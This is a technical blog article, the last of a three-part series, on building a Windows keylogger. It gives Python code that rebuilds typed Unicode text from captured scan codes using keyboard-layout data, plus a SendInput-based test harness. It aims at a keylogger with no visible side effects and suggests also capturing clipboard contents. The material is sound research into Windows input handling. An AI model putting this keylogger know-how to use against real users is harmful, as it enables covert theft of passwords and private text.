Writing a decent win32 keylogger [3/3]

Rédigé par Martin Balc'h - 21/12/2023 - dans Outils , Système - Téléchargement

In this series of articles, we talk about the ins and out of how to build a keylogger for Windows that is able to support all keyboard layouts and reconstruct Unicode characters correctly regardless of the language (excluding those using input method editors).

In the first part, after a brief introduction introducing the concepts of scan codes, virtual keys, characters and glyphs, we describe three different ways to capture keystrokes (GetKeyState, SetWindowsHookEx, GetRawInputData) and the differences between those techniques.

In the second part, we detail how Windows stores keyboard layouts information in the kbd*.dll and how to parse them.

In the third and last part, we go through the process of using the extracted information to convert scan codes into characters and all the tricky cases presented by different layouts, such as ligatures, dead keys, extra shift-states and SGCAPS.
Finally, we present our methodology to test and validate that our reconstruction is correct by writing a testing tool which can automate the injection of scan codes and retrieve the reference text produced by Windows which we compare with our reconstructed text.

Part 1 Part 2 Part 3 Github

In this last installment of our Writing a decent Win32 keylogger we use the techniques described in the first and second articles and complete our scan-code to character reconstruction process.

Reconstruction process

High level view

So now we have a pretty clear picture of what goes on in these DLLs, let’s write a reconstruction algorithm. We will use the Python programming language and assume that we already have a variable called layout that is the result of json.loads() of the correct JSON file’s content for the current keyboard layout.

Let’s start with a high level view of the process:

For each input event:

  1. Convert the scan code (and extended flags) to a virtual character using pusVSCtoVK, pVSCtoVK_E0 and pVSCtoVK_E1 lookup tables.
  2. Update the current shift state based on the latest key press or key release.
    1. handle left and right handed versions of shift state modifiers.
    2. handle LOCK keys (capslock, numlock, etc.)
  3. Look up the output character(s) from pVkToWcharTable based on our input virtual key and current shift state.
    1. handle regular characters
    2. handle dead characters
    3. handle ligatures
  4. update internal states
  5. output 0 or more characters

The initial implementation could look like this:

events = jsonl_load('events.jsonl')     # read all input key events from file
layout = load_layout('kbdfr.json')      # load the active keyboard layout
# prepare a state object that keeps track of which keys are currently pressed and a buffer for dead chars
state = {
    'vk':           [ 0 for i in range(0x100) ],
    'dead':         None,
    'capslock':     0,
    'numlock':      1,       # assume we start with numlock ON (default for windows)
    'scrolllock':   0,
}
# process all events
for evt in events:
    vk = sc_to_vk(evt['sc'], evt['e0'], evt['e1'], layout)
    shiftstate = update_shiftstate(vk, state, layout)
    col = shiftstate_to_column(shiftstate, layout)
    if evt['keyup']:
        # output characters only when the key is pressed, not when it is released
        continue
    ch, dead = vk_to_chars(vk, col, layout)
    out += output_char(ch, dead, vk, state, layout)
# print output
print(out)

Now let’s see in more details how we can implement those steps, starting with the scan code to virtual key conversion.

Scan code to virtual key conversion

def sc_to_vk(sc, e0, e1, state, layout) -> (int, str):

    # check in vsc_to_vk map first
    for it in layout['vsc_to_vk']:
        if it['sc'] == sc:
            # skip this entry if it has the "extended flags" and neither E0 nor E1 are set
            if 'KBDEXT' in it['flags'] and not e0 and not e1:
                continue
            # E0 or E1 but no KBDEXT flag, skip that one too
            elif 'KBDEXT' not in it['flags'] and (e0 or e1):
                continue
            # found a matching entry, return the virtual key and its name
            return it['vk'], it['vkn']

    # check extended scan codes
    if e0:
        for it in layout['vsc_to_vk_e0']:
            if it['sc'] == sc:
                return it['vk'], it['vkn']
    if e1:
        for it in layout['vsc_to_vk_e1']:
            if it['sc'] == sc:
                return it['vk'], it['vkn']

    # no match, unsupported scan code for this layout
    return None, None

It is important to go through the non-extended lookup table even when E0 and E1 are set as some entries have the KBDEXT flag. Our initial (naive) implementation just went through one of the tables based on the E0 and E1 flag values, but it missed keys (such as right shift).

Shift states

Now based on the virtual key that is pressed or released, we can update our current shift state, which means figuring out what is the current combination of “control”, “shift”, “alt” (and some other) keys. Here is what we can do:

  1. Keep track of the status of NUMLOCK, CAPSLOCK and SCROLLLOCK keys.
  2. Adjust the values of right/left handed modifiers to the generic versions (VK_RCONTROL => VK_CONTROL, VK_LCONTROL => VK_CONTROL, same for SHIFT and MENU)
  3. If the current keyboard layout has the ALT-GR flag, then handle VK_RMENU as both VK_MENU and VK_CONTROL.
  4. Update our internal state to keep track of which virtual keys are currently pressed.
  5. go through all modifier virtual keys for this layout and calculate the current shift state.
  6. convert the shift state value to a column index in the vk_to_wchars tables.

Here is an extract of the relevant code for the last 2 steps:

shiftstate = 0
for mod in layout['modifiers']:
    if state['vk'][mod['vk']]:
        shiftstate |= mod['modbits']
column = layout['shiftstates'][shiftstate]
if col == 15:
    # invalid shiftstate
    ...

Virtual key to characters

Now we have everything we need to perform a lookup in the PVK_TO_WCHAR_TABLE. Here’s our annotated code to handle it:

def vk_to_chars(vk, col, layout) -> tuple(int, int):
    '''
        The first item of the returned tuple is the output wchar_t value as an int.
        The second value is always none, except if the 1st value is WCH_DEAD,
            in which case the 2nd value is the dead character.
    '''
    # go through all the sub tables
    for vkmap in layout['vk_to_wchars']:
        # skip tables not containing enough columns (one or more shift states)
        if col >= vkmap['num_mods']:
            continue

        # go through all entries
        for i in range(len(vkmap['table'])):
            it = vkmap['table'][i]

            # does this entry match the current virtual key?
            if it['vk'] == vk:

                # here we handle a couple tricky cases

                # regular CAPSLOCK, code assumes VK_SHIFT is modifier with bit 1
                # (which is the case for all keymaps shipped in windows)
                if it['attrs'] == CAPLOK and not col and state['capslock']:
                    # capslock is engaged, the key has the CAPLOCK flag
                    # adjust the column as if VK_SHIFT was pressed
                    col = 1

                # skip SGCAPS entry if we have CAPSLOCK on and SHIFT
                if it['attrs'] == SGCAPS and state['capslock']:
                    continue

                # handle dead characters
                if it['wch'][col] == WCH_DEAD:
                    # also return the associated dead key
                    return it['wch'][col], vkmap['table'][i+1]['wch'][col]

                # regular case, we can just return the char value
                return it['wch'][col], None
    # nothing found
    return None, None

There is something we need to explain here about the handling of the WCH_DEAD case. When we get the magic value WCH_DEAD, we need to look at the next entry in the table to find out the value of the dead character. The capslock and SGCAPS lines will be detailed later on in the "Tricky cases" section of this article.

Output

The previous function can return the following values:

  • WCH_NONE: there is nothing to output
  • WCH_DEAD: there is nothing to output, the dead character must be stored for the next input event
  • WCH_LGTR: there is more than one character to output
  • unicode code point: there is exactly one character to output (in addition to the eventual buffered dead-char)

However, we also need to take in consideration potential buffered dead characters. Our algorithm to handle new characters to output is the following:

    output = []

    if current_char is WCH_NONE
        abort

    if buffered_dead_char
        combined_char = is_valid_deadchar_combination(buffered_dead_char, current_char, layout)

        // support for chained dead chars
        if combined_char and current_char is dead_char
            set buffered_dead_char = combined
            abort

        if combined
            output += [ combined_char ]
        else
            // bad deadchar combination
            output += [ buffered_dead_char, current_char ]

        set buffered_dead_char = none

    else if current_char is dead_char
        set buffered_dead_char = current_char

    else if current_char is ligature
        output += vk_to_ligature(current_char_vk) // this function returns an array of characters

    else
        // regular character
        output += [ current_char ]

    for each character in output
        print character

… And we finally print out the reconstructed text stream!

Tricky cases

Now we will focus on a few tricky edge cases we encountered during this research.

Numpad keys

In the vsc_to_vk tables, all numpad keys have both KBDSPECIAL and KBDNUMPAD flags - which means Windows does some special processing - but unfortunately, they always only point to the non-numlock virtual keys. So for the numpad key 0, the only entry we have points to VK_INSERT and never VK_NUMPAD0. This is a bit annoying as it forces us to add a special handling case and “fix” the virtual key value after our conversion from scan code. Here is the implementation:

def fix_numpad_vk(vk, state):
    '''
        numpad keys are handled differently, the mapping towards VK_NUMPAD*
        is not present in the keyboard layout dlls, juste the one to VK_INSERT, ...
        so fix it manually :/
    '''
    if not state['numlock']:
        return vk
    fix_map = {
        VK_INSERT:    VK_NUMPAD0,
        VK_END:       VK_NUMPAD1,
        VK_DOWN:      VK_NUMPAD2,
        VK_NEXT:      VK_NUMPAD3,
        VK_LEFT:      VK_NUMPAD4,
        VK_CLEAR:     VK_NUMPAD5,
        VK_RIGHT:     VK_NUMPAD6,
        VK_HOME:      VK_NUMPAD7,
        VK_UP:        VK_NUMPAD8,
        VK_PRIOR:     VK_NUMPAD9,
    }
    if vk in fix_map:
        return fix_map[vk]
    return vk

Extra shift states

Most keyboard layouts use the standard SHIFT, CONTROL and ALT modifiers and quite a few use ALT-GR, which is handled as CONTROL + ALT. So only 3 modifier keys are used in most cases, but not all of them!

A good example is KBDCAN.DLL which handles “Canadian Multilingual Standard” which supports typing English, French and a few other languages. On that layout, the right control key maps to VK_OEM_8 instead of the usual VK_RCONTROL and can also be combined with VK_SHIFT to procuce additionnal characters.

The algorithm and code described previously for the shift state calculation does handle those extra modifier keys.

Chained dead keys

We talked about dead keys quite a bit already, but there is a case we havent covered yet that can happen in at least two keyboard layouts: chained dead chars. Both “Cherokee Phonetic” and “French (Standard, BÉPO)” have the ability to chain dead keys. Here is an example for Cherokee:

Key strokes output character comments
q + o regular dead key with 2 key presses
d + s + SPACE chained dead keys
d + s + i chained dead keys

The support of this feature complicates the processing of dead chars and of output a little bit. Notably, you have to update your dead char buffer accordingly, keeping in mind that there will always be only one dead character in the buffer, but that it will change upon the second keypress.

ligatures

As we saw earlier, a single keypress can generate up to five distinct unicode characters. While there is no inherent difficulty in processing them, as our simple code can attest.

def vk_to_ligature(vk, modnum, layout):
    for lig in layout['ligatures']:
        if lig['vk'] == vk and modnum == lig['modnum']:
            return lig['chars']
    return None

...
print(''.join(vk_to_ligature(...)))

sgcaps

SGCaps stands for “Swiss German Capitals”, in this layout (and some other, mostly eastern european languages) holding SHIFT and having CAPSLOCK on are not equivalent. For example, let’s take the key VK_OEM_1 which has a whopping five labeled characters:

  • ü, when neither shift nor capslock are engaged
  • Ü, when CAPSLOCK is on (but shift is not)
  • è, when SHIFT is on (but CAPSLOCK is not)
  • È, when both SHIFT and CAPSLOCK are on
  • [, when only ALT-GR is on

Let’s see an annotated extract of the table vk_to_wchars in kbdsg.json that refers that specific virtual key.

{ "attrs": 2, "vk": 186, "vkn": "VK_OEM_1", "wch": [ 252 /* ü */, 232 /* è */, 91/* [ */, 27/* ESC */ ] }, 
{ "attrs": 0, "vk": 186, "vkn": "VK_OEM_1", "wch": [ 220 /* Ü */, 200 /* È */, 91/* [ */, 27/* ESC */ ] },

As you can see, we have two entries for the same virtual key, and the first entry has the SGCAPS flag (0x2). When processing entries such entries, you must rememeber to skip them if CAPSLOCK is engaged and go to the next one (without the SGCAPS flag).

Building a test program

In order to speed up testing and debugging, we wrote a simple win32 Python program which can be fed our keylogger’s output, which will then emulate the key-presses and retrieve the characters sent to the program by Windows. This gives us a frame of reference to validate our reconstruction.

Sending input events

To emulate input events, Windows offers the function SendInput which is defined as:

UINT SendInput(UINT cInputs, LPINPUT pInputs, int cbSize);

This function can be used to send multiple INPUT structures which are basically a union of MOUSEINPUT, KEYBDINPUT and HARDWAREINPUT. We will only send events of type KEYBDINPUT in our test program. Here is the structure’s definition:

typedef struct tagKEYBDINPUT {
  WORD      wVk;
  WORD      wScan;
  DWORD     dwFlags;
  DWORD     time;
  ULONG_PTR dwExtraInfo;
} KEYBDINPUT, *PKEYBDINPUT, *LPKEYBDINPUT;

To simulate key-presses, we only need to fill the wScan (scan code) and dwFlags members. It is important to set the KEYEVENTF_SCANCODE flag or else wVk (virtual key) member will be used instead of wScan. Additionally we conditionally set the flags KEYEVENTF_EXTENDEDKEY for E0 / E1 scan codes and the flag KEYEVENTF_KEYUP to indicate a key release.

Here is the python code that uses ctypes to call SendInput to inject key presses:

from ctypes import *
from ctypes import wintypes as w

# required flags / defines
KEYEVENTF_EXTENDEDKEY = 0x1
KEYEVENTF_KEYUP = 0x2
KEYEVENTF_UNICODE = 0x4
KEYEVENTF_SCANCODE = 0x8
INPUT_KEYBOARD = 1

# not defined by wintypes
ULONG_PTR = c_ulong if sizeof(c_void_p) == 4 else c_ulonglong

class KEYBDINPUT(Structure):
    _fields_ = [('wVk' ,w.WORD),
                ('wScan',w.WORD),
                ('dwFlags',w.DWORD),
                ('time',w.DWORD),
                ('dwExtraInfo',ULONG_PTR)]

class MOUSEINPUT(Structure):
    _fields_ = [('dx' ,w.LONG),
                ('dy',w.LONG),
                ('mouseData',w.DWORD),
                ('dwFlags',w.DWORD),
                ('time',w.DWORD),
                ('dwExtraInfo',ULONG_PTR)]

class HARDWAREINPUT(Structure):
    _fields_ = [('uMsg' ,w.DWORD),
                ('wParamL',w.WORD),
                ('wParamH',w.WORD)]

class DUMMYUNIONNAME(Union):
    _fields_ = [('mi',MOUSEINPUT),
                ('ki',KEYBDINPUT),
                ('hi',HARDWAREINPUT)] 

class INPUT(Structure):
    _anonymous_ = ['u']
    _fields_ = [('type',w.DWORD),
                ('u',DUMMYUNIONNAME)]

user32 = WinDLL('user32')
user32.SendInput.argtypes = w.UINT, POINTER(INPUT), c_int
user32.SendInput.restype = w.UINT

def send_scancode(code, up, ext):
    ''' uses SendInput to send a specified scancode, setting the appropriate flags for key up/down and e0/e1 extended flags '''
    i = INPUT()
    i.type = INPUT_KEYBOARD
    i.ki = KEYBDINPUT(0, code, KEYEVENTF_SCANCODE, 0, 0)
    if up:
        i.ki.dwFlags |= KEYEVENTF_KEYUP
    if ext:
        i.ki.dwFlags |= KEYEVENTF_EXTENDEDKEY

    return user32.SendInput(1, byref(i), sizeof(INPUT)) == 1

We can now use the function send_scancode specifying the scan code, if the key is pressed or released, and wether it’s an extended scan code or not.

Switching the keyboard layout

To speed up testing, we wanted to be able to change input languages on the fly with no manual GUI action. We first experimented with ActivateKeyboardLayout and other functions but it did not work in the end due to the fact that keyboard layouts are bound to threads, and to be more accurate, to the thread responsible for the creation of a window (HWND). In the case of a console program, it is actually created by conhost.exe and not the running program, which makes it harder to identify the right thread (and process!).

So the method we ended up using is to simply send the window message WM_INPUTLANGCHANGEREQUEST to the foreground window, which will work as long as our program has the focus. It looks like this:

# defines
WM_INPUTLANGCHANGEREQUEST = 0x0050

# prototypes
user32.GetForegroundWindow.restype = POINTER(w.HWND)
user32.SendMessageA.argtypes = POINTER(w.HWND),w.UINT,w.WPARAM,w.LPARAM
user32.SendMessageA.restype = c_int

def switch_layout(klid):
    '''
        uses SendMessageA to the current foreground window instead of
        ActivateKeyboardLayout / LoadkeyboardLayout which will not work
        if not called from the main thread of the current program,
        which is not the case with python ...
    '''
    return user32.SendMessageA( user32.GetForegroundWindow(), WM_INPUTLANGCHANGEREQUEST, 0, int(klid, 16)) == 0

Note: Since, there is a setting in Windows allowing all windows to use different input languages, you can’t rely on the keylogger’s active layout to be correct. So you need to figure out the intended recipient program’s active layout’s name and id. We initially found the active keyboard layout (HKL) for our target and then used ActivateKeyboardLayout and GetKeyboardLayoutNameA to get the KLID before restoring the original active keyboard layout in our own context. Which we discovered was a very bad idea: indeed, there was a very noticeable side effect affecting the target program preventing some keys from working (alt-gr combos for example). This is why we fell back to enumerating the registry’s keyboard layouts to get the HKL / KLID / dll name correlations.

Putting it all together

Now we have:

  • Three different key logger programs,
  • A keymap data extractor to transform keyboard layout DLLs into more useable JSON files,
  • A replayer program to get the correct output from a list of input scan codes and a keyboard layout,
  • And a reconstruction program that can use the output of all of the others to make sure everything is processed correctly!

All the code is available on github here.

Hopefully this article will help you understand a bit better how keyboard input works on Windows and how to write a good keylogger: one that supports multiple languages, that doesn’t hardcode a list of strings mapped to virtual keys, that handles dead keys, ligatures, multiple shift states and moreover, that doesn’t introduce visible side effects!

We haven't covered languages that use IME (input method editors), which simply put, add another layer between the input and the windows. Between their diversity, the fact that they can use both keyboard and mouse and can be customized, it doesn't seem very practical to emulate them. I would recommend attacking the problem from a different approach: hooking the window messages and look for WM_CHAR events. This way you get the correct characters directly with no added effort.

Finally, there are a few things we haven’t touched on yet that we yet could improve. All keys that move the cursor arround, suchs as arrow keys, page up, page down can affect the output. Let’s take for instance the following input A, LEFT, B. The output result would be BA and not AB. There is also the detection of CTRL-V which you may want to handle with a call to GetClipboardData(). We’ll leave that as an exercise for the reader ;)